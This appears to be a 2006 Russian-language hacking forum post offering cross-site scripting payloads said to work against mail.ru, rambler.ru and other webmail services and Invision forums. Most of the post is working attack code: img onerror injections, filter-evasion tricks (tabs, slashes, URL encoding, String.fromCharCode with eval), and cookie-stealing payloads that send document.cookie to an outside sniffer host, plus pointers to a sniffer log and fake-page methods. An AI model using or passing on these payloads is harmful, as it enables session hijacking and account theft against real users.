|
Banned
Регистрация: 26.02.2006
Сообщений: 5
Провел на форуме:
21186
Репутация:
-4
|
|
Код HTML:
<img src=http://www.xss.gif s='"p">'onerror=alert(/wj/) style=visibility:hidden>
Вот так ломается mail.ru, inbox.ru, bk.ru, list.ru, rambler.ru, и другие, а главное, что работает проверенно в Опере, Фаерфокс и ИЕ. (Сейчас четвертое Марта, 2006 год)
А вот так ломается инвизион 2.*
Код HTML:
[img]/[snapback] onerror=alert(/wj/) [/snapback].gif[/img]
Где Я поставил табуляции вместо пробелов.
И обратите внимание, что элемент img, не терпит в своем параметре какого либо пробела чтобы сработала функция onerror! Это можно ТОЛЬКО обойти посредством слеша ( /) или точкой с запитой. ( ;)
То есть вот так вот,
<img src="http://www.wj.gif<a href=" onerror=alert('wj') style="display:none;">
Именно из-за пробела в атрибуте src элемента img, в браузере фаерфокс скрипт не сработает! Но за-то вот так вот - сработает.
Код HTML:
<img src="http://www.wj.gif/<a href=" onerror=alert('wj') style="display:none;">
Или,
Код HTML:
<img src="http://www.wj.gif;<a href=" onerror=alert('wj') style="display:none;">
И еще, если этот же код написать в Опере, то работать не будет из-за style="display:none;" но это не беда, ибо можно просто написать вот так вот и все везде будет работать, будучи не видимо для пытливых глаз:
Код HTML:
<img src="http://www.wj.gif;<a href=" onerror=alert('wj') style="visibility:hidden">
Воруем куки...
Код HTML:
<img src=javascript:i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;>
И еще, иногда обойти фильтры посредством HTML объектов не удается, ( w) тогда приходится прибегать к урл кодировки о которой Я еще не нашел, чтобы кто нибудь знал.
Код HTML:
<img src="javascript:alert('wj')">
Кодируем в урл кодировку,
Код HTML:
<img src="javascript:%61%6C%65%72%74%28%27%77%6A%27%29">
Честно говорю, что очень мало кто знает об этом способе.... Ну и надо еще знать, что закодировать в урл кодировку можно только после протокола JavaScript и т.д.
Иногда приходится угнать куки при помощи vbscript, а как это делается? vbscript как Я теперь узнал, не поддерживает способы вызывать браузерам картинки так, как это в состоянии делать JavaScript, (По крайней мере Я таких примеров не встречал и не нашел) но это не беда, поскольку мы можем обходить эту дилемму посредством перехождения с одного протокола на другой.
Код HTML:
<img src=vbscript:window.execScript("img=new/**/Image();img.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;")>
И опять таки, иногда провести onerror() можно, а все параметры как нам на зло фильтруются и идет жуткая фильтрация на HTML объекты и на прочею дребедень. Ну тогда можно прибегнуть к нашему любимому String.fromCharCode()
<!-- Это нельзя писать произвольно, то большими буквами, то маленькими, то есть вот так, String.FromCharCode() работать у вас не будет. -->
И так, используем уже готовую ссылку,
http://ferruh.mavituna.com/stringfromcharcode.asp?
И кодируем следующую строку.
Код HTML:
document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;
Которая есть ни что иное как код сниффера, который работает к примеру вот так, в таком виде:
Код HTML:
<img src="http://www.badimage.gif" onerror='document.images[0].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;'>
И получаем следующие:
Char :
document.images[0].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;
Ascii :
100,111,99,117,109,101,110,116,46,105,109,97,103,1 01,115,91,48,93,46,115,114,99,61,34,104,116,116,11 2,58,47,47,97,110,116,105,99,104,97,116,46,114,117 ,47,99,103,105,45,98,105,110,47,115,46,106,112,103 ,63,34,43,100,111,99,117,109,101,110,116,46,99,111 ,111,107,105,101,59
JS Code :
Код HTML:
String.fromCharCode(100,111,99,117,109,101,110,116,46,105,109,97,103,101,115,91,48,93,46,115,114,99,61,34,104,116,116,112,58,47,47,97,110,116,105,99,104,97,116,46,114,117,47,99,103,105,45,98,105,110,47,115,46,106,112,103,63,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59);
Ну а теперь применяем наш закодированный вариант, в совокупности функцией eval()
Код HTML:
<img src="http://www.badimage.gif" onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,105,109,97,103,101,115,91,48,93,46,115,114,99,61,34,104,116,116,112,58,47,47,97,110,116,105,99,104,97,116,46,114,117,47,99,103,105,45,98,105,110,47,115,46,106,112,103,63,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59));>
Смотрим лог сниффера, http://www.antichat.ru/sniff/log.php
Если кто нибудь хочет узнать как создавать липовые страницы, то вот Я описал этот метод на этой ссылки.
http://video.antichat.net/file181.html
White Jordan.
Администрация несет полную ответственность за ваши взломы. |